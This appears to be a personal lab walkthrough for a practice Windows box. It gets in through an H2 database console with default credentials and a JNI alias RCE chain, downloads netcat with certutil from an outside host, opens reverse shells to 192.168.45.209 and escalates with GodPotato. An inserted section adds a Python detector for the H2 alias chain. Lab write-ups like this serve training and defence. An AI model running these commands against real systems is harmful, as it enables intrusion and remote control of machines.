## Enum
- webserver - 80
- Landing page for H2 database engine
- 445 - smb
- 8082 - H2 database web console
- default credentials: `sa:`
- version -> `1.4.199` (visible in admin GUI)
- http://192.168.199.66:8082/login.do?jsessionid=75be359333ec58dfb870dd9c52666d74
## Initial Access
![[Pasted image 20250606155618.png]]
- default credentials work
- RCE exploit for version `1.4.199`: `searchsploit -m 49384`
Paste the following into the H2 console to achieve RCE:
```
-- Write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', ....) -- full payload omitted, check the searchsploit file
-- Load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
```
And we achieve RCE as `jacko\tony`.
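For the defensive side, here is an added example (not part of the original notes) of a small checker that scans logged H2 SQL statements for the chain above: a file-write function dropping an executable, an alias bound to `java.lang.System.load` or a process API, and calls through such aliases. The log lines are constructed, and the `jdbc[3]:` prefix is an assumed format rather than verbatim H2 trace output; only the statements matter to the checker.

```python
import re

# Constructed sample in the spirit of an H2 trace log (the prefix format is
# illustrative, not a verbatim H2 trace); the statements mirror the chain above.
SAMPLE_LOG = """\
jdbc[3]: SELECT ID, NAME FROM CUSTOMERS WHERE ID = 7;
jdbc[3]: CREATE ALIAS IF NOT EXISTS UPPER_NAME FOR "com.example.Util.upper";
jdbc[3]: SELECT CSVWRITE('C:\\Windows\\Temp\\JNIScriptEngine.dll', 'SELECT NULL');
jdbc[3]: CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
jdbc[3]: CALL System_load('C:\\Windows\\Temp\\JNIScriptEngine.dll');
jdbc[3]: CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
jdbc[3]: CALL JNIScriptEngine_eval('new java.util.Scanner(...)');
"""

ALIAS_RE = re.compile(r'CREATE\s+ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(\w+)\s+FOR\s+"([^"]+)"', re.I)
WRITE_RE = re.compile(r"\b(CSVWRITE|FILE_WRITE)\s*\(\s*'([^']+)'", re.I)
CALL_RE = re.compile(r"\bCALL\s+(\w+)\s*\(", re.I)
# Java targets that hand SQL direct access to native loading or process execution.
NATIVE_TARGETS = ("java.lang.System.load", "java.lang.Runtime", "java.lang.ProcessBuilder")
EXEC_EXT = (".dll", ".so", ".exe", ".jar")


def analyze(log_text):
    """Return (line_no, severity, reason) for each suspicious statement, in order."""
    findings, aliases, flagged, native_loaded = [], {}, set(), False
    for n, line in enumerate(log_text.splitlines(), 1):
        if m := WRITE_RE.search(line):
            if m.group(2).lower().endswith(EXEC_EXT):
                findings.append((n, "high", f"{m.group(1).upper()} writes executable {m.group(2)}"))
        if m := ALIAS_RE.search(line):
            alias, target = m.group(1).lower(), m.group(2)
            aliases[alias] = target
            if target.startswith(NATIVE_TARGETS):
                flagged.add(alias)
                findings.append((n, "high", f"alias {m.group(1)} bound to {target}"))
            elif native_loaded:
                # Once a native library is loaded, a new alias may point into it.
                flagged.add(alias)
                findings.append((n, "high", f"alias {m.group(1)} created after native load -> {target}"))
            else:
                findings.append((n, "info", f"custom alias {m.group(1)} -> {target}; review"))
        if m := CALL_RE.search(line):
            alias = m.group(1).lower()
            if alias in flagged:
                findings.append((n, "high", f"call to flagged alias {m.group(1)}"))
                if aliases.get(alias, "").startswith("java.lang.System.load"):
                    native_loaded = True
    return findings
```

Statement logging has to be enabled on the H2 side for this to see anything; the stronger fix is not exposing the web console at all and setting a non-empty `sa` password.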
## Foothold
Download the netcat binary to the target:
```
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f \"http://192.168.45.209:8082/nc64.exe\" \"\\Users\\tony\\documents\\nc64.exe\"").getInputStream()).useDelimiter("\\Z").next()');
```
Execute it:
```
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec(" \\Users\\tony\\documents\\nc64.exe 192.168.45.209 4444 -e cmd.exe").getInputStream()).useDelimiter("\\Z").next()');
```
We get a shell callback and may now go and get the user flag.
Commands in this shell need full binary paths, e.g. under `\windows\system32`.
## Privesc
- Executing `\windows\system32\whoami /priv` reveals the `SeImpersonatePrivilege`.
- This enables us to perform a [[Windows Token Impersonation Attack]].
- We verify that the system `.NET` version is 4.0 using: `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"`
- Load the [[God Potato]] executable onto the target
- Start a netcat reverse shell listener
- Use it to start a reverse shell:
```
.\godpotato.exe -cmd "\users\tony\documents\nc64.exe 192.168.45.209 4000 -e cmd"
```
Execute and profit.
## Lessons Learned
- If missing binaries, go to `\windows\system32`
- See [[Fixing Missing Windows Binaries]]
- Took about an hour